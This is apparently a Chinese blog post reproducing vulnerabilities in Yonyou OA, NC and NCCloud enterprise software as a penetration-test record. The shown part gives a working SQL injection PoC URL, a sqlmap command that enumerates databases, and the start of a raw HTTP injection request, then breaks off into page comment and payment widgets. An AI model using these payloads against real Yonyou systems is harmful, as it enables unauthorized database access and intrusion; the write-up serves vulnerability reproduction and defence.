用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录

本文详细介绍了用友公司多个产品存在的安全漏洞,包括SQL注入、远程命令执行和文件操作漏洞。提供了漏洞复现的POC和利用方式,并给出了相应的sqlmap检测命令。同时,文章强调了非法使用信息的危害,并提出了升级版本和限制访问等修复建议。

简介

用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。

漏洞情况
用友OA_U8 存在SQL 注入
用友NCCloud FS文件管理 SQL 注入
用友NC bsh.servlet.BshServlet 远程命令执行
用友NC 任意文件上传 getShell

漏洞复现

1.用友 OA_U8 SQL 注入

poc

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

如果出现一下指纹 则存在sql注入点 注入点是 S1

用友sql注入指纹

直接使用SqlMap 进行检测

python sqlmap.py -u url/yyoa/common/js/menu/test.jsp?doType=101&S1=1 --random-agent -p S1 --dbs
2.用友 NCCloud FS文件管理 SQL 注入

poc

GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: xxxxx
Upgrade-Insecure-Requests: 1
Use
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值